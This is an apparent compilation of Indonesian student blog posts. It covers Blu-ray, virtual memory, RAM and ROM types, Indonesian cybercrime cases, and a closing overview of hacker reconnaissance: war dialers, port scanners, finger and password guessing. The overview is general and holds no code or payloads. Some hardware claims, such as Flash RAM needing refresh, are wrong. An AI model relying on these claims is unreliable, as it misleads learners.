Cakram Blu-ray (Inggris: Blu-ray Disc disingkat BD) adalah sebuah format cakram optik untuk penyimpanan media digital termasuk video definisi tinggi. Nama Blu-ray diambil dari laser biru-ungu yang digunakan untuk membaca dan menulis cakram jenis ini. Cakram Blu-ray dapat menyimpan data yang lebih banyak dari format DVD yang lebih umum karena panjang gelombang laser biru-ungu yang dipakai hanya 405 nm dimana lebih pendek dibandingkan laser merah, 650 nm yang dipakai DVD dan CD. Format saingan Blu-ray yaitu HD DVD juga menggunakan laser jenis yang sama. Cakram Blu-ray dapat menyimpan 25 GB pada setiap lapisannya dibandingkan dengan 4,7 GB pada DVD. Beberapa pabrik bahkan telah membuat cakram Blu-ray satu lapis dan dua lapis (50 GB) yang dapat ditulis ulang. Beberapa studio film yang mendukung format Blu-ray bahkan telah merilis atau mengumumkan akan merilis film pada cakram berkapasitas 50 GB. Blu-ray lebih pendek dari panjang gelombang laser memungkinkan untuk menyimpan lebih banyak informasi pada 12 cm CD / DVD ukuran disk. Minimum “spot size” di mana sebuah laser dapat terfokus dibatasi oleh difraksi, dan bergantung pada panjang gelombang dari cahaya dan kecepatan rana numerik dari lensa yang digunakan untuk fokus itu. Dengan penurunan panjang gelombang, meningkatkan kecepatan rana numerik 0,60-0,85 dan membuat penutup lapisan tipis agar terhindar dari efek optik yang tidak diinginkan, laser dapat difokuskan ke tempat yang lebih kecil. Hal ini memungkinkan lebih banyak informasi yang akan disimpan di daerah yang sama.
sumber:http://kilometer69informatika.wordpress.com/2012/11/06/optical-disc-drive/
blog tugas
Rabu, 27 Februari 2013
pengertian virtual memory


Dalam ilmu komputer, memori virtual adalah teknik manajemen memori yang dikembangkan untuk kernel multitugas. Teknik ini divirtualisasikandalam berbagai bentuk arsitektur komputer dari komputer penyimpanan data (seperti memori akses acak dan cakram penyimpanan), yang memungkinkan sebuah program harus dirancang seolah-olah hanya ada satu jenis memori, memori "virtual", yang bertindak secara langsung beralamat memori baca/tulis (RAM).

Sebagian besar sistem operasi modern yang mendukung memori virtual juga menjalankan setiap proses di ruang alamat khususnya sendiri. Setiap program dengan demikian tampaknya memiliki akses tunggal ke memori virtual. Namun, beberapa sistem operasi yang lebih tua (seperti OS/VS1 danOS/VS2 SVS) dan bahkan yang modern yang (seperti IBM i) adalah sistem operasi ruang alamat tunggal yang menjalankan semua proses dalam ruang alamat tunggal yang terdiri dari memori virtual.

Memori virtual membuat pemrograman aplikasi lebih mudah oleh fragmentasi persembunyian dari memori fisik; dengan mendelegasikan ke kernel beban dari mengelola hierarki memori (sehingga menghilangkan keharusan untuk program dalam mengatasi hamparan secara eksplisit); dan, bila setiap proses berjalan dalam ruang alamat khususnya sendiri, dengan menghindarkan kebutuhan untuk merelokasi kode program atau untuk mengakses memori dengan pengalamatan relatif.

Virtualisasi memori adalah generalisasi dari konsep memori virtual.

Memori virtual (dalam bahasa Inggris: virtual memory) adalah sebuah mekanisme yang digunakan oleh aplikasi untuk menggunakan sebagian dari hierarki memori seolah-olah ia menggunakannya sebagai RAM wujud yang terpasang di dalam sebuah sistem. Mekanisme ini beroperasi dengan cara memindahkan beberapa kode yang tidak dibutuhkan ke sebuah berkas di dalam kandar keras (hard drive) yang disebut dengan berkas tukar, berkas halaman atau tukar petak. - Selengkapnya



Jadi, Virtual Memori adalah suatu sistem yang digunakan oleh sistem operasi untuk menggunakan sebagian dari memori sekunder (Harddisk). Seolah-olah sistem tersebut menggunakan memori internal / primary (RAM) fisik yang terpasang pada sebuah sistem komputer. Cara kerja sistem ini beroperasi dengan cara memindahkan beberapa kode yang tidak dibutuhkan ke sebuah berkas pada Hard Drive yang biasa disebut dengan Page File. Proses pemakaian virtual memori pada windows umumnya dapat dilihat di Task Manager.

Beberapa keuntungan penggunaan memori virtual adalah sebagai berikut:
Berkurangnya proses I/O yang dibutuhkan (lalu lintas I/O menjadi rendah). Misalnya untuk program butuh membaca dari disk dan memasukkan dalam memory setiap kali diakses.
Ruang menjadi lebih leluasa karena berkurangnya memori fisik yang digunakan. Contoh, untuk program 10 MB tidak seluruh bagian dimasukkan dalam memori fisik. Pesan-pesan error hanya dimasukkan jika terjadi error.
Meningkatnya respon, karena menurunnya beban I/O dan memori.
Bertambahnya jumlah pengguna yang dapat dilayani. Ruang memori yang masih tersedia luas memungkinkan komputer untuk menerima lebih banyak permintaan dari pengguna.

Beberapa sistem operasi memerlukan yang namanya virtual memory. Layaknya Linux yang membutuhkan swap, microsoft windows vista ataupun XP pun membutuhkan yang namanya virtual memory. Pengertian dari Virtual memory itu sendiri yakni memori sementara yang digunakan komputer untuk menjalankan berbagai program aplikasi ataupun menyimpan data yang membutuhkan memory yang lebih besar dari memory yang telah tersedia ( Memory fisik seperti RAM, baca disini untuk lebih lengkap ). Program ataupun data yang tidak muat dimasukan pada memory asli ( RAM ), akan disimpan ke dalam sebuah Pagging File. Pengertian Pagging fileialah data yang hanya disimpan sementara atau bisa disebut swap. Pada sistem operasi linux kita diharuskan untuk membuat dua partisi utama yaitu untuk system dan untuk swap. Virtual Memory ini Berbeda halnya dengan Memory fisik seperti RAM, karena ram merupakan komponen yang termasuk kedalam golongan hardware. Walapun dalam kenyatannya Virtual Memory ini disimpan di harddisk, tetapi kerjannya itu tidak tampak, artinya berjalan secara software namun disimpan dihardware. Data yang disimpan ini tidak dapat bertahan lama, dalam artian hanya saat di gunakan saja. Dan bila komputer dimatikan, data data yang tadinya ada di virtual memory akan hilang. Jadi Fungsi Virtual Memoryialah untuk mengoptimalkan kinerja dari komputer, dengan tambahan memory, maka kemungkinan terjadi crash sangat kecil sekali. Ukuran dari paging file biasanya berbeda - beda, kalau ukuran paging file linuxialah 2 kali lipat dari memory aslinya. Misalkan kita memakai memory berkapasitas 512 MB, maka ukuran paging filenya yaitu 1 GB. Walaupun tidak harus 2 GB, tapi untuk memaksimalkan kinerja maka sebaiknya 2 kali lipatnya. Dan untuk Ukuran Paging file Di windows XP dan Vista Yaitu 1,5 kali dari kapasitas aslinya. Misalkan kita menggunakan memory sebesar 1 GB, maka paging filenya sebesar 1,5 GB. Dalam Xp maupun Vista paging file ini dinamai dengan pagefile.sys bila anda ingin mencarinya, pasti tidak akan ketemu, karena file ini disembunyikan atau hidden files.
Konsep Virtual Memori Pada Windows

Pada komputer kita, jumlah memory yang tersedia adalah jumlah antara memory fisik/RAM dengan virtual memory. Virtual memory adalah sebuah porsi pada hard disk yang di-set menyerupai RAM oleh system. Virtual memory merupakan ruang penyimpanan sementara yang digunakan untuk menjalankan program yang membutuhkan memory yang lebih besar dari memory fisik.
Virtual memory berupa file yang bernama pagefile.sys yang di-set hidden oleh Windows. File ini disebut paging file, yang digunakan untuk menampung program dan data yang tidak cukup di memory fisik. Virtual memory lebih lambat daripada memory fisik, dan penggunaan yang terlalu banyak dapat menurunkan kinerja sistem. Sehubungan dengan itu, windows memindahkan proses yang tidak terlalu sering ke virtual memory, dan membiarkan proses yang sering digunakan di memory fisik. Jadi ini sangat efisien.
Ukuran dari virtual memory dapat kita rubah, Windows merekomendasikan ukuran minimal dari vitual memory adalah 1.5 kali dari memory fisik kita. Jika anda memiliki beberapa harddisk, misal hardisk pertama adalah C: dan harddisk kedua adalah D: dan anda jarang menggunakan drive D:, anda dapat memindahkan virtual memory ke drive D:. Memindahkan virtual memory ke harddisk yang jarang digunakan akan sedikit meningkatkan performa. Alasannya adalah, pada harddisk pertama biasanya head dari harddisk sangat sibuk untuk membuka program, dokumen, menyimpan file dan masih banyak lagi. Tetapi ingat, cara ini tidak akan berguna bila drivenya terletak pada harddisk yang sama atau dengan kata lain sebuah partisi.
Dalam proses ini seluruh program akan ditempatkan di disk sekunder dan membawa halaman-halaman yang diperlukan ke memori fisik sehingga memori utama hanya akan menyimpan sebagian alamat proses yang sering digunakan dan sebagian lainnya akan disimpan dalam disk sekunder dan dapat diambil sesuai dengan kebutuhan.Jadi jika proses yang sedang berjalan membutuhkan instruksi atau data yang terdapat pada suatu halaman tertentu maka halaman tersebut akan dicari di memori utama. Jika halaman yang diinginkan tidak ada maka akan dicari ke disk sekunder.

Konsep Virtual Memory:
• Pemisahan antara “user logical memory” (virtual) dengan “physical memory”.
• Logical address space (program) dapat lebih besar dari alokasi memori fisik yang diberikan.
• Hanya sebagian kecil dari program yang harus berada di memori untuk eksekusi.
• Terdapat mekanisme untuk melakukan alokasi dan dealokasi page (swapped out dan in) sesuai dengan kebutuhan (referensi program).
• Terdapat bagian dari disk menyimpan sisa page (program) yang sedang dijalankan di memori.
Virtual memory dapat diimplementasikan melalui :
• Demand paging, menerapkan konsep pemberian halaman pada proses
Demand segmentation, lebih kompleks diterapkan ukuran segmen yang bervariasi.

Konsep Virtual Memori Pada Linux

Memori

Organisasi dan manajemen memori sangat mempengaruhi kinerja komputer. Manajemen memori melakukan tugas penting dan kompleks berkaitan dengan:
• Memori utama sebagai sumber daya yang harus dialokasikan dan dipakai bersama diantara sejumlah proses yang aktif. Agar dapat memanfaatkan pemroses dan fasilitas masukan/keluaran secara efisien, maka diinginkan memori yang dapat menampung sebanyak mungkin proses.
• Upaya agar pemrogram atau proses tidak dibatasi kapasitas memori fisik di system komputer.
Linux memanfaatkan virtual memori untuk mendukung kinerja sistem. Sebagai sistem operasi multiprogramming, virtual memori dapat meningkatkan efisisensi sistem. Sambil proses menunggu bagiannya diswap masuk ke memori, menunggu selesainya operasi masukan/keluaran dan proses diblocked. Jatah waktu pemroses dapat diberikan ke proses-proses lain.

Manajemen memori Linux menyediakan:
1. Ruang alamat besar
Ruang alamat dapat lebih besar dibanding memori fisik yang tersedia
2. Proteksi
Tiap proses di sistem mempunyai ruang alamat maya tersendiri. Ruang ruang alamat maya itu sepenuhnya terpisah. Proses yang berjalan di satu aplikasi tidak dapat mengganggu proses lainnya.
3. Pemetaan memori
Dilakukan pemetaan antara memori maya ke memori fisik yang tersedia.
4. Memori maya bersama (shared virtual memory)
Memori maya bersama ini untuk menghemat ruang memori, seperti pustaka dinamis bagi beberapa proses.
Karena memori fisik lebih sedikit dibanding memori maya, maka sistem hanya memuatkan page-page maya yang saat itu sedang digunakan proses. Linux memuatkan page maya begitu diperlukan. Teknik ini disebut dengan demand paging. Saat pemroses berusaha mengakses alamat maya yang tidak di memori fisik, pemroses tidak dapat menemukan isian di tabel page maya. Pemroses menerbitkan page fault.
• Jika alamat maya yang dituju tak absah (yaitu proses berusaha mengakses alamat maya yang tidak dibolehkan), maka sistem operasi mengakhiri proses itu untuk memproteksi proses-proses lain.
• Jika alamat maya yang dituju absah tapi tidak sedang di memori fisik, maka sistem operasi harus membawa page ke memori dari disk. Pengaksesan disk memerlukan waktu lama. Jika terdapat proses lain yang dapat dijalankan, maka sistem operasi memilih proses lain untuk dijalankan. Proses dimulai kembali di instruksi dimana page fault terjadi. Pemroses dapat memetakan memori maya ke memori fisik saat dilakukan pengaksesan memori maya, sehingga proses terus berjalan. Jika tidak terdapat memori bebas, sistem operasi harus membuat ruang bagi page yang akan dimasukkan dengan membuang page lain dari memori.
• Jika page telah dimodifikasi (dirty-page), sistem operasi harus menjaga isi page. Ketika dipindahkan dari memori, disimpan di ruang khusus (swap space).
• Jika page yang dibuang berupa page belum ditulisi maka page tidak perlu dituliskan ke disk.
Linux menempatkan proses pada memori yang dibagi menjadi sejumlah partisi. Pemartisian ini bersifat dinamis maka jumlah, lokasi dan ukuran proses di memori dapat beragam sepanjang waktu secara dinamis. Proses yang akan masuk ke memori segera dibuatkan partisi sesuai kebutuhan. Linux menciptakan ruang disk tempat swap terlebih dahulu, saat proses diciptakan, ruang swap pada disk dialokasikan. Ketika proses harus dikeluarkan dari memori utama, proses selalu ditempatkan ke ruang yang telah dialokasikan, bukan ke tempat tempat berbeda setiap kali terjadi swap-out. Ketika proses berakhir, ruang swap pada disk didealokasikan.

http://anggunkurnia58.blogspot.com/2013/02/pengertian-virtual-memory.html
Jenis-Jenis Memori (RAM dan ROM)

Pengetahuan September 16th, 2013

Memori (atau lebih tepat disebut memori fisik) merupakan istilah generik yang merujuk pada media penyimpanan data sementara pada komputer. Setiap program dan data yang sedang diproses oleh processor akan disimpan di dalam memori fisik. Data yang disimpan dalam memori fisik bersifat sementara, karena data yang disimpan di dalamnya akan tersimpan selama komputer tersebut masih dialiri daya (dengan kata lain, komputer itu masih hidup). Ketika komputer itu direset atau dimatikan, data yang disimpan dalam memori fisik akan hilang. Oleh karena itulah, sebelum mematikan komputer, semua data yang belum disimpan ke dalam media penyimpanan permanen (umumnya berbasis disk, semacam hard disk atau floppy disk), sehingga data tersebut dapat dibuka kembali di lain kesempatan. Memori fisik umumnya diimplementasikan dalam bentuk Random Access Memory(RAM), yang bersifat dinamis. Mengapa disebut Random Access, adalah karena akses terhadap lokasi-lokasi di dalamnya dapat dilakukan secara acak (random), bukan secara berurutan (sekuensial). Meskipun demikian, kata random access dalam RAM ini sering menjadi salah kaprah. Sebagai contoh, memori yang hanya dapat di baca (ROM), juga dapat diakses secara random, tetapi ia dibedakan dengan RAM karena ROM dapat menyimpan data tanpa kebutuhan daya dan tidak dapat ditulisi sewaktu-waktu. Selain itu, hard disk yang juga merupakan salah satu media penyimpanan juga dapat diakses secara acak, tapi ia tidak digolongkan ke dalam Random Access Memory.

Beberapa jenis memori yang di gunakan :

1. Read Only Memory (ROM)

2. Random Access Memory (RAM)

3. Flash Disk

4. Hardisk

5. Memory Cache

Tetapi disini saya akan hanya membahas mengenai perbedaan ROM dan RAM secara detail, berikut adalah penjelasannya

Read Only Memory (ROM)

Read-only Memory(ROM) adalah istilah untuk media penyimpanan data pada komputer. ROM ini adalah salah satu memori yang ada dalam computer. ROM ini sifatnya permanen, artinya program / data yang disimpan di dalam ROM ini tidak mudah hilang atau berubah walau aliran listrik di matikan.Contohnya adalah switch mekanis.

Jenis – jenis ROM

Beberapa jenis ROM yang pernah beredar dan terpasang pada komputer, antara lain
PROM (Progammable Read-Only-Memory)
EPROM (Erasable Programmable Read-Only-Memory)
EEPROM (Electrically Erasable Programmable Read-Only Memory)

PROM (Progammable Read-Only-Memory)

Jika isi ROM ditentukan oleh vendor, PROM dijual dalam keadaan kosong dan kemudian dapat diisi dengan program oleh pemakai. Setelah diisi dengan program, isi PROM tak bisa dihapus.

EPROM (Erasable Programmable Read-Only-Memory)

Isi EPROM dapat dihapus setelah diprogram. Penghapusan dilakukan dengan menggunakan sinar ultraviolet.

EEPROM (Electrically Erasable Programmable Read-Only Memory)

EEPROM dapat menyimpan data secara permanen, tetapi isinya masih bisa dihapus secara elektris melalui program. Salah satu jenis EEPROM adalah Flash Memory. Flash Memory biasa digunakan pada kamera digital, konsol video game, dan cip BIOS.

Random Access Memory (RAM)

RAM adalah memori dalam sistem komputer yang berguna untuk menampung data sementara dan mengirimnya kembali untuk segera diakses dan diproses oleh prosesor.Karena kecepatan prosesor lebih tinggi dari kecepatan hardisk,maka diperlukan RAM untuk menyeimbangkan data keluar masuk dari hardisk.

Jenis – jenis RAM
DRAM (Dynamic RAM)
SDRAM (Sychronous Dynamic RAM)
RDRAM (Rambus Dynamic RAM)
SRAM (Static RAM)
EDO RAM (Extended Data Out RAM)
FPM DRAM (First Page Mode DRAM)
Flash RAM

DRAM (Dynamic RAM)

Jenis RAM yang secara berkala harus disegarkan oleh CPU agar data yang terkandung didalamnya tidak hilang.

SDRAM (Sychronous Dynamic RAM)

SDRAM (Sychronous Dynamic RAM) adalah jenis RAM yang merupakan kelanjutan dari DRAM namun telah diskronisasi oleh clock sistem dan memiliki kecepatan lebih tinggi daripada DRAM. Cocok untuk sistem dengan bus yang memiliki kecepatan sampai 100 MHz

RDRAM (Rambus Dynamic RAM)

RDRAM (Rambus Dynamic RAM) adalah jenis memory yang lebih cepat dan lebih mahal dari pada SDRAM.

SRAM (Static RAM)

SRAM (Static RAM) adalah jenis memori yang tidak memerlukan penyegaran oleh CPU agar data yang terdapat di dalamnya tetap tersimpan dengan baik. RAM jenis ini memiliki kecepatan lebih tinggi daripada DRAM. SDRAM

EDO RAM (Extended Data Out RAM)

EDO RAM (Extended Data Out RAM) adalah jenis memori yang digunakan pada sistem yang menggunakan Pentium. Cocok untuk yang memiliki bus denagan kecepatan sampai 66 MHz.

FPM DRAM (First Page Mode DRAM)

FPM DRAM (First Page Mode DRAM) adalah merupakan bentuk asli dari DRAM. Laju transfer maksimum untuk cache L2 mendekati 176 MB per sekon.

Flash RAM

Flash RAM adalah jenis memory berkapasitas rendah yang digunakan pada perngkat elektronika seperti, TV, VCR, radio mobil, dan lainnya. Memerlukan refresh dengan daya yang sangat kecil.

http://nurhadikusumo.blog.upi.edu/2013/09/16
/jenis-jenis-memori-ram-dan-rom/


Selasa, 14 Oktober 2014

KEAMANAN KOMPUTER


KEAMANAN KOMPUTER

Menurut saya Keamanan Komputer Sangat Dibutuhkan karena:

1.Information Based Society menyebabkan informasi menjadi sangat
penting dan menuntut kemampuan untuk mengakses dan menyediakan
informasi secara tepat dan akurat menjadi sangat esensial bagi sebuah
organisasi.

2.Infrastruktur Jaringan komputer, seperti LAN dan Internet, memungkinkan
untuk menyediakan informasi secara cepat, sekaligus membuka potensi
adanya lubang keamanan (security hole)

3.Perkembangan Teknologi , seperti makin canggihnya computer dan
diketemukan ATM ( Anjungan Tunai Mandiri ). Dapat menjadi Sasaran
keamanan komputer terhadap pencurian atau korupsi

4. Sumber daya manusia ,makin berkembangnya pengetahuan sehingga mengubah cara berpikir dan
makin tingginya pendidikan manusia.
formats/html/ID-Security-HOWTO-2.html)

5. Kehidupan Sosial, kita ketahui bahwa zaman ekonomi semakin susah
sehingga orang berpikir untuk mendapatkan penghasilan secara cepat dan
mudah.
http://alimunsir.blogspot.com/2012/11/kejahatan-komputer.html


Kejahatan Komputer semakin meningkat karena :

1. Aplikasi berbasis TI dan jaringan computer meningkat.

a.E-Banking
Contoh Kejahatan E-banking :

Data Forgery Pada E-Banking BCA
Dunia perbankan melalui Internet (e-banking) Indonesia, dikejutkan oleh ulah seseorang bernama Steven Haryanto, seorang hacker dan jurnalis pada majalah Master Web. Lelaki asal Bandung ini dengan sengaja membuat situs asli tapi palsu layanan Internet banking Bank Central Asia, (BCA). Steven membeli domain-domain dengan nama miriphttp://www.klikbca.com (situs asli Internet banking BCA), yaitu domainhttp://www.klik-bca.com,www.kilkbca.com,http://www.clikbca.com,http://www.klickca.com. Dan http://www.klikbac.com. Isi situs-situs plesetan inipun nyaris sama, kecuali tidak adanya security untuk bertransaksi dan adanya formulir akses (login form) palsu. Jika nasabah BCA salah mengetik situs BCA asli maka nasabah tersebut masuk perangkap situs plesetan yang dibuat oleh Steven sehingga identitas pengguna (user id) dan nomor identitas personal (PIN) dapat di ketahuinya.

b. Electronic Data Interchange (EDI)
Contoh Kejahatan Electronic Data Interchange (EDI)

Salah satu contoh kasus yang terjadi adalah pencurian dokumen terjadi saat utusan khusus Presiden Susilo Bambang Yudhoyono yang dipimpin Menko Perekonomian Hatta Rajasa berkunjung di Korea Selatan. Kunjungan tersebut antara lain, guna melakukan pembicaraan kerja sama jangka pendek dan jangka panjang di bidang pertahanan. Delegasi Indonesia beranggota 50 orang berkunjung ke Seoul untuk membicarakan kerja sama ekonomi, termasuk kemungkinan pembelian jet tempur latih supersonik T-50 Golden Eagle buatan Korsel dan sistem persenjataan lain seperti pesawat latih jet supersonik, tank tempur utama K2 Black Panther dan rudal portabel permukaan ke udara. Ini disebabkan karena Korea dalam persaingan sengit dengan Yak-130, jet latih Rusia. Sedangkan anggota DPR yang membidangi Pertahanan (Komisi I) menyatakan, berdasar informasi dari Kemhan, data yang diduga dicuri merupakan rencana kerja sama pembuatan 50 unit pesawat tempur di PT Dirgantara Indonesia (DI). Pihak PT DI membenarkan sedang ada kerja sama dengan Korsel dalam pembuatan pesawat tempur KFX (Korea Fighter Experiment). Pesawat KFX lebih canggih daripada F16. Modus dari kejahatan tersebut adalah mencuri data atau data theft, yaitu kegiatan memperoleh data komputer secara tidak sah, baik digunakan sendiri ataupun untuk diberikan kepada orang lain. Indentity Theft merupakan salah satu jenis kejahatan ini yang sering diikuti dengan kejahatan penipuan. Kejahatan ini juga sering diikuti dengan kejahatan data leakage. Perbuatan melakukan pencurian data, sampai saat ini tidak ada diatur secara khusus.
http://lizamainardianty.wordpress.com/2012/08/03/10-contoh-kasus-cyber-crime-yang-pernah-terjadi-beserta-modus-dan-analisa-penyelesaiannya/

c. e-Commerce
 Contoh Kejahatan . e-Commerce

Satu lagi kasus yang berkaitan dengan cybercrime di Indonesia, kasus tersebut diputus di Pengadilan Negeri Sleman dengan Terdakwa Petrus Pangkur alias Bonny Diobok Obok. Dalam kasus tersebut, terdakwa didakwa melakukan Cybercrime. Dalam amar putusannya Majelis Hakim berkeyakinan bahwa Petrus Pangkur alias Bonny Diobok Obok telah membobol kartu kredit milik warga Amerika Serikat, hasil kejahatannya digunakan untuk membeli barang-barang seperti helm dan sarung tangan merk AGV. Total harga barang yang dibelinya mencapai Rp. 4.000.000,- (Pikiran Rakyat, 31 Agustus 2002).

http://megabrilianingrum.blogspot.com/2013/11/kejahatan-bisnis-dalam-e-commerce.html

2.Adanya Desentralisasi Server (Hacker)
Contoh kejahatan Desentralisasi Server :

Penyebaran virus dengan sengaja, ini adalah salah satu jenis kasus cyber crime yang terjadi pada bulan Juli 2009, Twitter (salah satu jejaring social yang sedang naik pamor di masyakarat belakangan ini) kembali menjadi media infeksi modifikasi New Koobface, worm yang mampu membajak akun Twitter dan menular melalui postingannya, dan menjangkiti semua follower. Semua kasus ini hanya sebagian dari sekian banyak kasus penyebaran malware di seantero jejaring social. Twitter tak kalah jadi target, pada Agustus 2009 diserang oleh penjahat cyber yang mengiklankan video erotis. Ketika pengguna mengkliknya, maka otomatis mendownload Trojan-Downloader.Win32.Banload.sco.
Modus serangannya adalah selain menginfeksi virus, akun yang bersangkutan bahkan si pemiliknya terkena imbas. Karena si pelaku mampu mencuri nama dan password pengguna, lalu menyebarkan pesan palsu yang mampu merugikan orang lain, seperti permintaan transfer uang . Untuk penyelesaian kasus ini, Tim keamanan dari Twitter sudah membuang infeksi tersebut. Tapi perihal hukuman yang diberikan kepada penyebar virusnya belum ada kepastian hukum.
http://deluthus.blogspot.com/2011/02/8-contoh-kasus-cyber-crime-yang-pernah.html

3.Adanya Single Vendor ke Multi Vendor
Contoh Kejahatan Single Vendor ke Multi Vendor :

Pada hari Sabtu, 17 April 2004, Dani Firmansyah, konsultan Teknologi Informasi (TI) PT Danareksa di Jakarta berhasil membobol situs milik Komisi Pemilihan Umum (KPU) di http://tnp.kpu.go.id dan berhasil melakukan perubahan pada seluruh nama partai disitus TNP KPU pada jam 11:24:16 sampai dengan 11:34:27. Perubahan ini menyebabkan nama partai yang tampil pada situs yang diakses oleh publik, seusai Pemilu Legislatif lalu, berubah menjadi nama-nama lucu seperti Partai Jambu, Partai Kelereng, Partai Cucak Rowo, Partai Si Yoyo,Partai Mbah Jambon, Partai Kolor Ijo, dan lain sebagainya. Dani menggunakan teknik SQL Injection(pada dasarnya teknik tersebut adalah dengan cara mengetikkan string atau perintah tertentu di address bar browser) untuk menjebol situs KPU. Kemudian Dani tertangkap pada hari Kamis, 22 April 2004. Dan sidang kasus pembobolan situs TNP Komisi Pemilihan Umum (KPU) digelar Senin(16/8/2004).

http://freezcha.wordpress.com/2011/02/27/contoh-kasus-cybercrime-bagian1/
http://kartini-16110022.blogspot.com/2013/04/kasus-kejahatan-komputer-di-indonesia.html

4.Adanya Peningkatan Kemampuan Pemakaian :
Contoh Kejahatan Peningkatan Kemampuan Pemakaian :

Kasus ini terjadi saat ini dan sedang dibicarakan banyak orang, kasus video porno Ariel “PeterPan” dengan Luna Maya dan Cut Tari, video tersebut di unggah di internet oleh seorang yang berinisial ‘RJ’ dan sekarang kasus ini sedang dalam proses.
Pada kasus tersebut, modus sasaran serangannya ditujukan kepada perorangan atau individu yang memiliki sifat atau kriteria tertentu sesuai tujuan penyerangan tersebut.
Penyelesaian kasus ini pun dengan jalur hukum, penunggah dan orang yang terkait dalam video tersebut pun turut diseret pasal-pasal sebagai berikut, Pasal 29 UURI No. 44 th 2008 tentang Pornografi Pasal 56, dengan hukuman minimal 6 bulan sampai 12 tahun. Atau dengan denda minimal Rp 250 juta hingga Rp 6 milyar. Dan atau Pasal 282 ayat 1 KUHP.
http://lizamainardianty.wordpress.com/2012/08/03/10-contoh-kasus-cyber-crime-yang-pernah-terjadi-beserta-modus-dan-analisa-penyelesaiannya/

5. Adanya yang berhubungan dengan internet
Contoh kejahatan yang berhubungan dengan internet :
Penjahat yang berhubungan dengan internet tersebut disebut dengan istilah "Cracker". Cracker adalah musuh besar bagi Hacker karena mereka memiliki tujuan yang berkebalikan. Cracker memiliki tujuan untuk merusak komputer korban melalui internet sedangkan hacker memiliki tujuan untuk mengamankan atau memproteksi sistem pertahanan komputer. Banyak orang yang menganggap bahwa hacker sama saja dengan cracker padahal keduanya sangatlah berbeda, hanya mereka sama-sama seorang programmer yang mana bisa menyusup sistem keamanan komputer.
Sudah banyak perusahaan-perusahaan besar yang telah meminta bantuan para hacker untuk memproteksi sistem keamanan komputer perusahaan, beberapa perusahaan besar tersebut adalah Google, Yahoo, Microsoft, dan berbagai perusahaan lainnya.
Pada tahun 1983, pertama kalinya FBI menangkap kelompok kriminal komputer The 414s(414 merupakan kode area lokal mereka) yang berbasis di Milwaukee AS. Kelompok yang kemudian disebut hacker tersebut melakukan pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan

http://oliviacomic.wordpress.com/2013/09/23/kejahatan-dunia-maya-serta-contoh-dan-solusinya/

Memahami Cara kerja Hacker :


1 .MENCARI SISTEM KOMPUTER.

Sejak dulu, walaupun ketika itu tidak banyak komputer terhubung kedalam jaringan, para hacker mulai menampakkan diri. Ketika itu mereka mencari sistem dengan cara menghubungi nomor telepon yang dicurigai ada akses ke jaringan dengan modem. Biasanya yang menjadi sasaran adalah nomor telepon perusahaan besar yang kemungkinan besar memiliki akses jaringan. Kemudian mereka menghubungi nomor yang memberikan sinyal carrier. Jika sinyal karier ini ditemukan mereka merasa senang karena menemukan celah untuk menyusup ke komputer yang terhubung melalui modem dan line telepon. Walaupun melakukannya secara manual, lambat laun mereka sering melakukannya dengan program khusus yang disebut preffik scanner, Demon Dialer, atau War Dialer. Salah satu contoh dari program tersebut adalah ToneLoc.
Namun ketika internet mulai mengglobal, dengan sebagian besar komputer sudah terhubung ke jaringan, para hacker semakin mudah mencari sasaran komputer host. Saat ini yang perlu dicari bukanlah komputernya, melainkan pintu masuk yang bisa dimanfaatkan dalam sistem komputer tersebut. “Pintu”masuk disini adalah port, yaitu jalur-jalur keluar-masuknya data dari dan ke suatu komputer yang proses aksesnya disebut “port-surfing”. Pencarian port yang dapat digunakan biasa dilakukan dengan program khusus yang disebut Port Scanner. Contohnya Rebelion, PortPro dan PortScanner (mampu memeriksa sekelompok IP untuk memcari port yang terbuka). Diantara port yang sering terbuka adalah Port 23 (telnet), Port 43 (whois), port 79 (finger), dan port 25 (simple mail transfer protokol).

Servis-servis yang sering terdapat ini kemudian hari dapat digunakan untuk mengumpulkan informasi lebih jauh tentang host yang akan dijadikan sasaran. Servis yang paling umum adalah finger.

Finger, servis yang umum bagi sistem operasi UNIX (meskipun sudah ada versi windowsnya, misalnya finger32) adalah perintah yang dapat menampilkan informasi mengenai seorang pemakai jaringan. Cara kerjanya sebagai berikut. Bila seseorang menjalankan program utility finger client (misalnya finger32) tadi untuk mencari keterangan A di sistem B, misalnya, program finger client tadi akan mengirimkan ke finger daemon di sistem B. Daemon dalam konteks ini bukanlah makhluk meraqh yang berekor dan bertanduk (dan jidatnya ada angka 666), melainkan program yang ditempatkan sebagai penunggu prot-port pada host di internet. Daemon ini tugasnya menjalankan perintah dari luar secaraotomatis, misalnya mailer daemon, finger daemon, dan sebagainya. Finger daemon yang kemudian akan mengirimkan informasi yang diminta ketujuan. Kelengkapan informasi yang diberikan bisa berbeda-beda, tergantung konfigurasi sistem yang digunakan. Informasi yang umum ditampilkan antara lain lagin name, waktu login terakhir dan nama pemakai.

Contoh konfigurasi servis finger yang tidak umum telah dilakukan oleh beberapa staf ilmu komputer di Carnagie Mellon University beberapa tahun yang lalu. Ketika itu mereka menghubungkan komputer di DEC3100 yang menjalankan servis finger dengan sebuah otomat minuman dingin. Ini agar mereka bisa mengunakan perintah finger dari ruangan mereka masing-masing (ke coke@cs.cmu.edu) untuk mengetahui jumlah minuman yang amsih ada, dingin/tidaknya, dan jenisnya tanpa datang dan melihatnya sendiri.

Finger juga bisa digunakan untuk melihat daftar pemakaidalam suatu sistem, dalam hal ini, yang difinger adalah host-nya bukan nama pemakai secara spesifik, seperti finger host sasaran.com.

Perusahaan besar biasanya menonaktifkan fingerdaemon pada sistem mereka (dengan menyunting file /etc/inetd.conf) untuk menjaga keamanan jaringan mereka. Bila finger dilakukan pada sistem-sistem semacam itu, akan muncul pesan Connection Refused. Selain melakukan scanning terhadap port terbuka, juga bisa dilakukan scanning secara umum. Biasanya untuk mengetahui jenis sitem operasi dalam komputer, tipe daemon, file share (NETBIOS pada sistem berbasis Wndows).
2.MENYUSUP DAN MENYADAP PASSWORD.

Sesuai namanya, cara ini dilakukan dengan cara menebak kombinasi username dan password dalam sistem yang dijadikan sasaran. Dulu sekali, orang masih belum begitu sadar akan pentingnya password yang sulit ditebak, sehingga password mudah ditebak dengan cara manual. sekarang, cara menebak password ini dilakukan dengan menggunakan program.
